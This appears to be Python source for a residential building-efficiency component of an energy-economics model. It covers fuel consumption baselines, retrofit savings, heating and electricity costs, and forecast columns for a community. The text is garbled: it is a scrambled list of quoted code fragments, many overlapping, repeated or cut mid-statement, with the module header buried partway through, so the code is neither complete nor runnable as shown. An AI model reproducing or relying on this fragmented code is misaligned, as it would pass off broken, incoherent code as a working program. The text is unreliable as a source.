self.init_HF+np.float64(rd[\"Fuel", "Attributes ---------- proposed_fuel_Hoil_consumption : np.array proposed heating oil consumption proposed_fuel_wood_consumption : np.array proposed", "(MMBtu/year) Cost Savings\": self.get_heating_savings_costs(), \"Residential: Heating Oil (gallons/year) Consumption Baseline\": b_oil, \"Residential: Heating", "kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh self.proposed_kWh_cost = self.proposed_kWh_consumption * kWh_cost def calc_capital_costs (self):", "DataFrame import os from aaem.components.annual_savings import AnnualSavings from aaem.community_data import CommunityData from aaem.forecast", "b_oil_cost, \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\": r_oil_cost , \"Residential: Heating Oil", "Post Retrofit\", \"Residential: Electric Heat (kWh/year) Consumption Savings\", \"Residential: Heating Propane (gallons/year) Consumption", "\"\"\"Set columns in the the forecast to values calculated in this component \"\"\"", "df.round().astype(int) except ValueError: pass df = df[[ \"Residential: Heating Oil (gallons/year) Consumption Baseline\",", "---------- fuel_amnt: float % of fuel used total_consumption : float total consumption for", "len(kWh_cost) self.baseline_kWh_cost = self.baseline_kWh_consumption * kWh_cost def calc_proposed_fuel_consumption (self): \"\"\"Calculate the proposed heating", "community_data.get_section('community') #~ self.copied_elec = community_data.copies.\\ #~ ix[\"yearly electric summary\"].values[0] if self.cd[\"model electricity\"]: self.elec_prices", "\"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Consumption", "self.capital_costs = self.opportunity_HH * self.refit_cost_rate def calc_annual_electric_savings (self): \"\"\"calculate annual electric savings created", "Electric Heat (kWh/year) Consumption Savings\": s_elec, \"Residential: Electric Heat (kWh/year) Cost Baseline\": b_elec_cost,", "efficiency of residential buildings (homes). Consumption and savings are based on the number", "self.proposed_HF_consumption[:self.actual_project_life] return (base_heat - post_heat) * constants.mmbtu_to_gal_HF def get_total_energy_produced (self): \"\"\"Get total energy", ": np.array proposed heating oil consumption proposed_fuel_wood_consumption : np.array proposed cordwood consumption proposed_fuel_LP_consumption", "cost to retrofit each home is also calculated. Parameters ---------- community_data : CommunityData", "Electric Heat (kWh/year) Cost Baseline\", \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\", \"Residential:", "/ self.base_pop))) def run (self, scalers = {'capital costs':1.0}): \"\"\"Runs the component. The", "a known Heat Recovery project for this component to run. Parameters ---------- scalers", "print self.opportunity_HH if self.opportunity_HH < 0: self.opportunity_HH = 0 self.diagnostics.add_note(self.component_name, \"calculate Houses to", "np.float64(fuel_amnt * (total_consumption - HH_consumption) * cf) def calc_baseline_fuel_consumption (self): \"\"\"Calculate baseline fuel", "specific data for a community. Initial value: 'Residential Buildings' section of community_data See", "electric consumption \"\"\" self.proposed_fuel_Hoil_consumption = \\ self.baseline_fuel_Hoil_consumption - self.savings_HF self.proposed_fuel_wood_consumption = \\ self.baseline_fuel_wood_consumption", "improvements ($) \"\"\" self.capital_costs = self.opportunity_HH * self.refit_cost_rate def calc_annual_electric_savings (self): \"\"\"calculate annual", "r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP = b_LP - r_LP b_LP_cost = self.baseline_fuel_LP_consumption * LP_price", "\"Residential: Heating Propane (gallons/year) Consumption Savings\": s_LP, \"Residential: Heating Propane (gallons/year) Cost Baseline\":", "cost'] * \\ community_data.get_item( 'community', 'regional construction multiplier' ) self.set_project_life_details( self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"]", "= forecast self.refit_cost_rate = \\ self.comp_specs['average refit cost'] * \\ community_data.get_item( 'community', 'regional", "+= amnt self.init_gas = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0", "savings in heating cordwood consumption savings_gas : float savings in natural gas fuel", "prices') self.comp_specs = community_data.get_section(COMPONENT_NAME) self.component_name = COMPONENT_NAME self.forecast = forecast self.refit_cost_rate = \\", "value: 'Residential Buildings' section of community_data See also -------- aaem.community_data : community data", "#~ self.init_coal #~ self.init_solar #~ self.init_other msg = str(round(percent_accounted)) + \\ \" of", "proposed_HF_cost : np.array proposed heating fuel cost \"\"\" HF_price = (self.diesel_prices + self.cd['heating", "np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) avg_EUI_reduction = np.float64(rd[\"Post-Retrofit", "cost of electricity per year \"\"\" self.cd[\"electric prices\"].index = \\ self.cd[\"electric prices\"].index.astype(int) #~", "self.baseline_fuel_Hoil_consumption) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\", years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed", "Ratio, Levelized Cost of Energy, and Internal Rate of Return will all be", "(gallons/year) Cost Post Retrofit\": r_oil_cost , \"Residential: Heating Oil (gallons/year) Cost Savings\": s_oil_cost,", "forecasted price of offset heating fuels. The cost to retrofit each home is", "CommunityData Object aaem.forecast : forecast module, see information on Forecast Object aaem.diagnostics :", "def calc_baseline_fuel_consumption (self): \"\"\"Calculate baseline fuel consumption Attributes: baseline_fuel_Hoil_consumption : np.array baseline heating", "self.baseline_fuel_gas_consumption * gas_price + \\ self.baseline_fuel_LP_consumption * LP_price + \\ self.baseline_fuel_kWh_consumption * gas_price", "= DataFrame({ \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\": self.get_base_HF_use(), \"Residential: Heating Fuel", "<gh_stars>1-10 \"\"\" Residential Efficiency component body ------------------------------------- \"\"\" import numpy as np from", "np.float64(rd[\"LP\"]) / 100.0 self.savings_LP = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1,", "Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\", \"Residential: Heating Fuel All (MMBtu/year)", "HF_price + \\ self.baseline_fuel_wood_consumption * wood_price + \\ self.baseline_fuel_gas_consumption * gas_price + \\", "False otherwise reason : string lists reason for failure if run == False", "prerequisite component data this component has no prerequisites leave empty Attributes ---------- diagnostics", "run variables. See note on accepted scalers Attributes ---------- run : bool True", "Electric Heat (kWh/year) Consumption Baseline\": b_elec, \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\":", "* constants.mmbtu_to_gal_HF def get_total_energy_produced (self): \"\"\"Get total energy produced. Returns ------- float the", "a # of houses cf: float conversion factor Returns ------- float: fuel consumed", "\"propane_residential_consumed [gallons/year]\", years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\", years,", "value: diag or new diagnostics object forecast : forecast community forecast for estimating", "* self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0", "Heating Biomass (cords/year) Consumption Baseline\", \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\", \"Residential:", "for a community. Initial value: 'community' section of community_data comp_specs : dictionary component", "wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price", "\"Residential: Heating Biomass (cords/year) Cost Savings\", \"Residential: Electric Heat (kWh/year) Cost Baseline\", \"Residential:", "< 0: self.opportunity_HH = 0 self.diagnostics.add_note(self.component_name, \"calculate Houses to retrofit was negative, setting", "Forecast from aaem.diagnostics import Diagnostics import aaem.constants as constants from config import COMPONENT_NAME,", "self.savings_mmbtu if self.cd['natural gas price'] == 0: self.proposed_fuel_gas_consumption = 0 # coal,solar, other", "\"Residential: Electric Heat (kWh/year) Cost Post Retrofit\": r_elec_cost, \"Residential: Electric Heat (kWh/year) Cost", "Consumption Savings\", \"Residential: Electric Heat (kWh/year) Consumption Baseline\", \"Residential: Electric Heat (kWh/year) Consumption", "= b_LP_cost - r_LP_cost b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG = b_NG", "savings in electric consumption savings_mmbtu: float total savings in mmbtu \"\"\" rd =", "adjust normal run variables. See note on accepted scalers Attributes ---------- run :", "self.baseline_HF_cost = \\ self.baseline_fuel_Hoil_consumption * HF_price + \\ self.baseline_fuel_wood_consumption * wood_price + \\", "= self.cd['cordwood price'] elec_price = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price = self.cd['propane price'] gas_price", "Post Retrofit\": r_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\": s_NG_cost, \"Residential: Total", "total = area * EUI # the one in each of these function", "Benefit ($/year)\" ]] df[\"community\"] = self.cd['name'] df[\"population\"] = self.forecast.get_population(self.start_year, self.end_year).astype(int) df = df[df.columns[-2:].tolist()", "self.calc_npv(self.cd['discount rate'], self.cd['current year']) self.calc_levelized_costs(0) def get_fuel_total_saved (self): \"\"\"Get total fuel saved. Returns", "Natural Gas (Mcf/year) Consumption Post Retrofit\": r_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption", "Consumption Savings\": s_NG, \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\": b_NG_cost, \"Residential: Heating", "(gallons/year) Cost Savings\", \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\", \"Residential: Heating Natural", "= np.float64(rd[\"Electricity\"]) / 100.0 self.savings_kWh = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total,", "gas consumption proposed_fuel_kWh_consumption : np.array proposed electric consumption proposed_HF_consumption : np.array proposed total", "(1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption (self): \"\"\"Calculate the baseline kWh consumption", "diag = None, prerequisites = {}): \"\"\"Class initialiser Parameters ---------- community_data : CommunityData", ": np.array set to baseline values \"\"\" self.proposed_kWh_consumption = self.baseline_kWh_consumption def calc_proposed_fuel_cost (self):", "consumption per household (kWh/year). >= 6000 \"\"\" # 500 average energy use, 12", "Cost Savings\", \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\", \"Residential: Heating Fuel All", "* wood_price + \\ self.baseline_fuel_gas_consumption * gas_price + \\ self.baseline_fuel_LP_consumption * LP_price +", "self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption = self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler * constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption", "diagnostics, optional diagnostics for tracking error/warning messages prerequisites : dictionary of components, optional", "error/warning messages initial value: diag or new diagnostics object forecast : forecast community", "= self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio = b_bio - r_bio b_bio_cost = self.baseline_fuel_wood_consumption * wood_price r_bio_cost", "np.array proposed cordwood consumption proposed_fuel_LP_consumption : np.array proposed LP consumption proposed_fuel_gas_consumption : np.array", "self.baseline_fuel_gas_consumption * gas_price r_NG_cost = self.proposed_fuel_gas_consumption * gas_price s_NG_cost = b_NG_cost - r_NG_cost", "Savings\", \"Residential: Total Cost Savings ($/year)\", \"Residential: Net Benefit ($/year)\" ]] df[\"community\"] =", "self.households = households.ix[self.start_year:self.end_year].T.values[0] val = self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total Occupied'] self.init_HH = int(round(HH*(val /", "constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 percent_accounted += amnt self.init_wood = self.calc_consumption_by_fuel(amnt, total,", "area * EUI # the one in each of these function calls is", ": np.array baseline heating fuel consumption baseline_fuel_wood_consumption : np.array baseline cordwood consumption baseline_fuel_gas_consumption", "body ------------------------------------- \"\"\" import numpy as np from pandas import DataFrame import os", "self.baseline_fuel_Hoil_consumption * HF_price r_oil_cost = self.proposed_fuel_Hoil_consumption * HF_price s_oil_cost = b_oil_cost - r_oil_cost", "self.cd[\"model heating fuel\"]: #~ self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns() if self.cd[\"model", "val = self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total Occupied'] self.init_HH = int(round(HH*(val / self.base_pop))) def run", "float initial electric consumption \"\"\" rd = self.comp_specs['data'] ## total consumption total =", "Gas\"]/100.0) * \\ scaler * constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption = \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_LP", "(MMBtu/year) Consumption Post Retrofit\": self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\": self.get_base_HF_use()", "Gas (Mcf/year) Consumption Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\", \"Residential:", "run == False Notes ----- Accepted scalers: capital costs. \"\"\" self.was_run = True", "* \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_kWh) #~ self.savings_coal #~ self.savings_solar #~ self.savings_other self.savings_mmbtu", "baseline kWh consumption for a community Attributes ---------- baseline_kWh_consumption : np.array electric consumption", "proposed LP consumption proposed_fuel_gas_consumption : np.array proposed natural gas consumption proposed_fuel_kWh_consumption : np.array", "Cost Savings\": self.get_heating_savings_costs(), \"Residential: Heating Oil (gallons/year) Consumption Baseline\": b_oil, \"Residential: Heating Oil", "proposed electric consumption proposed_HF_consumption : np.array proposed total electric consumption \"\"\" self.proposed_fuel_Hoil_consumption =", "rd[\"Fuel Oil\"] / 100.0 HH = self.households #~ print HH area = np.float64(rd[\"Pre-Retrofit", "savings in propane consumption savings_kWh : float savings in electric consumption savings_mmbtu: float", "(kWh/year) Cost Baseline\", \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\", \"Residential: Electric Heat", "self.get_proposed_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\": self.get_heating_savings_costs(), \"Residential: Heating Oil (gallons/year)", "saved in gallons \"\"\" base_heat = \\ self.baseline_HF_consumption[:self.actual_project_life] post_heat = \\ self.proposed_HF_consumption[:self.actual_project_life] return", "1, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 self.savings_LP = avg_EUI_reduction * self.opportunity_HH *", "Propane (gallons/year) Cost Savings\", \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\", \"Residential: Heating", "\"Residential: Total Cost Savings ($/year)\": self.get_total_savings_costs(), \"Residential: Net Benefit ($/year)\": self.get_net_benefit(), }, years)", "self.baseline_fuel_gas_consumption = 0 self.baseline_HF_consumption = \\ self.baseline_fuel_Hoil_consumption * \\ (1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption *", "in a year. That's where the 6000.0 # comes from. con_threshold = self.comp_specs['min", "b_elec, \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\": r_elec, \"Residential: Electric Heat (kWh/year)", "on Forecast Object aaem.diagnostics : diagnostics module, see information on Diagnostics Object \"\"\"", ": np.array electric consumption per yer \"\"\" HH = self.households self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH", "or new diagnostics object forecast : forecast community forecast for estimating future values", "\\ self.baseline_fuel_kWh_consumption * gas_price # coal,solar, other def calc_baseline_kWh_cost (self): \"\"\"calculate baseline electricity", "- r_NG_cost years = np.array(range(self.project_life)) + self.start_year df = DataFrame({ \"Residential: Heating Fuel", "(self): \"\"\"Calculate post retrofit electricity costs Attributes ---------- proposed_kWh_cost: np.array proposed electricity cost", "years) try: df = df.round().astype(int) except ValueError: pass df = df[[ \"Residential: Heating", "diagnostics() self.intertie_data = community_data.intertie_data self.cd = community_data.get_section('community') #~ self.copied_elec = community_data.copies.\\ #~ ix[\"yearly", "type of fuel \"\"\" HH_consumption = HH * self.avg_kWh_consumption_per_HH * \\ constants.kWh_to_mmbtu return", "self.fuel_oil_percent = rd[\"Fuel Oil\"] / 100.0 HH = self.households #~ print HH area", "\\ rd[\"BEES Total Consumption (MMBtu)\"] + \\ rd[\"Pre-Retrofit Avg Area (SF)\"] * \\", "annual electric savings created by the project Attributes ---------- annual_electric_savings : np.array electric", "Cost Post Retrofit\": r_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Savings\": s_bio_cost, \"Residential: Electric", "capital_costs : float total cost of improvements ($) \"\"\" self.capital_costs = self.opportunity_HH *", "gas_price def calc_proposed_kWh_cost (self): \"\"\"Calculate post retrofit electricity costs Attributes ---------- proposed_kWh_cost: np.array", "calc_init_HH (self): \"\"\"Estimate the # of households for the first year of the", "= \\ self.baseline_fuel_Hoil_consumption * \\ (1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption * \\ (1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption", "r_bio_cost = self.proposed_fuel_wood_consumption * wood_price s_bio_cost = b_bio_cost - r_bio_cost b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh", "kWh/yr*$/kWh self.proposed_kWh_cost = self.proposed_kWh_consumption * kWh_cost def calc_capital_costs (self): \"\"\"Calculate the capital costs.", "Natural Gas (Mcf/year) Cost Savings\": s_NG_cost, \"Residential: Total Cost Savings ($/year)\": self.get_total_savings_costs(), \"Residential:", "consumption baseline_fuel_kWh_consumption : np.array baseline electricity consumption baseline_HF_consumption : np.array baseline total heating", "def calc_proposed_fuel_cost (self): \"\"\"Calculate proposed heating cost Attributes ---------- proposed_HF_cost : np.array proposed", "self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\", years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed", "def __init__ (self, community_data, forecast, diag = None, prerequisites = {}): \"\"\"Class initialiser", "= np.float64(rd[\"Post-Retrofit Avg. EUI Reduction\"]) total = area * EUI # the one", "None: self.diagnostics = diagnostics() self.intertie_data = community_data.intertie_data self.cd = community_data.get_section('community') #~ self.copied_elec =", "2010, the performance improvements as a percentage of the pre-retrofit consumption, and the", "per household (kWh/year). >= 6000 \"\"\" # 500 average energy use, 12 months", "rate'], scalers['capital costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'], self.cd['current year']) self.calc_levelized_costs(0) def get_fuel_total_saved (self): \"\"\"Get", "years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\ \"heat_energy_demand_residential [mmbtu/year]\", years, self.baseline_HF_consumption) def save_component_csv (self, directory): \"\"\"Save the", "r_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\": s_NG_cost, \"Residential: Total Cost Savings", "* self.opportunity_HH #~ self.baseline_total_energy_consumption = total HH = self.init_HH percent_accounted = 0 amnt", "to completion, False otherwise reason : string lists reason for failure if run", "in heating oil consumption savings_wood : float savings in heating cordwood consumption savings_gas", "= self.proposed_fuel_Hoil_consumption * HF_price s_oil_cost = b_oil_cost - r_oil_cost b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio", "heating fuels per year \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium']) self.hoil_price", "be calculated. There must be a known Heat Recovery project for this component", "(1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood * (1/constants.mmbtu_to_cords) +\\ self.savings_gas * (1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh * (1/constants.mmbtu_to_kWh)", "energy use, 12 months in a year. That's where the 6000.0 # comes", "= avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility", "Baseline\": b_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\": r_bio_cost, \"Residential: Heating Biomass", "\"\"\"Runs the component. The Annual Total Savings,Annual Costs, Annual Net Benefit, NPV Benefits,", "\"\"\" if not self.was_run: return if self.cd[\"model financial\"]: HF_price = (self.diesel_prices + self.cd['heating", "premium']) wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price']", "else: HF_price = np.nan wood_price = np.nan elec_price = np.nan LP_price = np.nan", "Savings\": s_elec, \"Residential: Electric Heat (kWh/year) Cost Baseline\": b_elec_cost, \"Residential: Electric Heat (kWh/year)", "self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\", years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\",", "fuel from the total consumption Parameters ---------- fuel_amnt: float % of fuel used", "(Mcf/year) Cost Baseline\": b_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\": r_NG_cost,", ", \"Residential: Heating Oil (gallons/year) Cost Savings\": s_oil_cost, \"Residential: Heating Biomass (cords/year) Consumption", "the proposed heating fuel consumption Attributes ---------- proposed_fuel_Hoil_consumption : np.array proposed heating oil", "by the project Attributes ---------- annual_heating_savings : np.array heating savings ($/year) \"\"\" self.annual_heating_savings", "\" of residential fuel sources accounted for\" self.diagnostics.add_note(self.component_name, msg) def calc_savings_opportunities (self): \"\"\"Calculate", "Consumption (MMBtu)\"] + \\ rd[\"Pre-Retrofit Avg Area (SF)\"] * \\ rd[\"Pre-Retrofit Avg EUI", "= \"OK\" tag = self.cd['file id'].split('+') if len(tag) > 1 and tag[1] !=", "\"\"\" self.proposed_fuel_Hoil_consumption = \\ self.baseline_fuel_Hoil_consumption - self.savings_HF self.proposed_fuel_wood_consumption = \\ self.baseline_fuel_wood_consumption - self.savings_wood", "self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\", years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\",", "wood_price r_bio_cost = self.proposed_fuel_wood_consumption * wood_price s_bio_cost = b_bio_cost - r_bio_cost b_elec =", "self.get_net_benefit(), }, years) try: df = df.round().astype(int) except ValueError: pass df = df[[", "leave empty Attributes ---------- diagnostics : diagnostics for tracking error/warning messages initial value:", "costs \"\"\" self.annual_electric_savings = np.zeros(self.project_life) def calc_annual_heating_savings (self): \"\"\"calculate annual heating savings created", "consumption Attributes ---------- proposed_fuel_Hoil_consumption : np.array proposed heating oil consumption proposed_fuel_wood_consumption : np.array", "#~ self.baseline_total_energy_consumption = total HH = self.init_HH percent_accounted = 0 amnt = np.float64(rd[\"Fuel", "\"Residential: Heating Oil (gallons/year) Consumption Savings\": s_oil, \"Residential: Heating Oil (gallons/year) Cost Baseline\":", "df[\"population\"] = self.forecast.get_population(self.start_year, self.end_year).astype(int) df = df[df.columns[-2:].tolist() + df.columns[:-2].tolist()] fname = os.path.join(directory, self.cd['name']", "Parameters ---------- scalers : dictionary of valid scalers, optional Scalers to adjust normal", "+\\ self.component_name.lower() + \"_output.csv\") fname = fname.replace(\" \",\"_\") # save to end of", "scalers : dictionary of valid scalers, optional Scalers to adjust normal run variables.", "np.nan b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil = self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil = b_oil - r_oil b_oil_cost", "Heat (kWh/year) Cost Savings\", \"Residential: Heating Propane (gallons/year) Cost Baseline\", \"Residential: Heating Propane", "(SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) scaler = (HH - self.init_HH) *", "of residential fuel sources accounted for\" self.diagnostics.add_note(self.component_name, msg) def calc_savings_opportunities (self): \"\"\"Calculate savings", "to values calculated in this component \"\"\" years = range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\ \"heating_fuel_residential_consumed [gallons/year]\",", "Heating Fuel All (MMBtu/year) Cost Savings\": self.get_heating_savings_costs(), \"Residential: Heating Oil (gallons/year) Consumption Baseline\":", "\"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\": self.get_proposed_HF_use(), \"Residential: Heating Fuel All", "---------- proposed_kWh_cost: np.array proposed electricity cost \"\"\" kWh_cost = self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year] kWh_cost", "---------- directory : path output directory \"\"\" if not self.was_run: return if self.cd[\"model", "avg_con = self.intertie_data.get_item( 'Residential Energy Efficiency', 'data' )['average kWh per house'] #~ self.avg_monthly_consumption", "r_bio b_bio_cost = self.baseline_fuel_wood_consumption * wood_price r_bio_cost = self.proposed_fuel_wood_consumption * wood_price s_bio_cost =", "constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 percent_accounted += amnt self.init_kWh = self.calc_consumption_by_fuel(amnt, total,", "Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"]) scaler = (HH -", "($/year)\" ]] df[\"community\"] = self.cd['name'] df[\"population\"] = self.forecast.get_population(self.start_year, self.end_year).astype(int) df = df[df.columns[-2:].tolist() +", "return self.baseline_HF_consumption[:self.actual_project_life] - \\ self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption (self): \"\"\"Get the average monthly consumption", "heating fuel consumption baseline_fuel_wood_consumption : np.array baseline cordwood consumption baseline_fuel_gas_consumption : np.array baseline", "baseline_HF_cost : np.array baseline cost of heating fuels per year \"\"\" HF_price =", "Consumption Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Post Retrofit\", \"Residential: Heating Fuel", "Attributes ---------- init_HF : float initial heating oil consumption init_wood : float initial", "self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns() if self.cd[\"model financial\"]: self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost()", "/ 100.0 percent_accounted += amnt self.init_kWh = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_kWh) #~ self.init_coal", "(kWh/year) Consumption Post Retrofit\", \"Residential: Electric Heat (kWh/year) Consumption Savings\", \"Residential: Heating Propane", "= self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec = b_elec - r_elec b_elec_cost = self.baseline_fuel_kWh_consumption * elec_price r_elec_cost", "\\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 self.savings_LP = avg_EUI_reduction", "where the 6000.0 # comes from. con_threshold = self.comp_specs['min kWh per household'] yr", "self.diagnostics.add_note(self.component_name, (\"Average residential Electric consumption\" \" corrected to \"+ str(con_threshold)+\" kWh per year\"))", "scaler * constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption = \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler * constants.mmbtu_to_cords self.baseline_fuel_gas_consumption = self.init_gas", "potential improvements to heating efficiency of residential buildings (homes). Consumption and savings are", "dictionary component specific data for a community. Initial value: 'Residential Buildings' section of", "(kWh/year) Cost Baseline\": b_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\": r_elec_cost, \"Residential:", "self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\", years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed", "savings created by the project Attributes ---------- annual_electric_savings : np.array electric savings ($/year)", "Cost Post Retrofit\": r_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Savings\": s_elec_cost, \"Residential: Heating", "Baseline\": b_oil_cost, \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\": r_oil_cost , \"Residential: Heating", "Savings,Annual Costs, Annual Net Benefit, NPV Benefits, NPV Costs, NPV Net Benefits, Benefit-Cost", "---------- baseline_kWh_consumption : np.array electric consumption per yer \"\"\" HH = self.households self.baseline_kWh_consumption", "electric savings ($/year) are the difference in the base and proposed fuel costs", "aaem.diagnostics import Diagnostics import aaem.constants as constants from config import COMPONENT_NAME, UNKNOWN class", "Number\"] self.opportunity_HH = np.float64( self.opportunity_HH ) #~ print self.opportunity_HH if self.opportunity_HH < 0:", "* (1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh * (1/constants.mmbtu_to_kWh) +\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel (self, fuel_amnt,", "Heating Natural Gas (Mcf/year) Consumption Post Retrofit\": r_NG, \"Residential: Heating Natural Gas (Mcf/year)", "Occupied'] self.init_HH = int(round(HH*(val / self.base_pop))) def run (self, scalers = {'capital 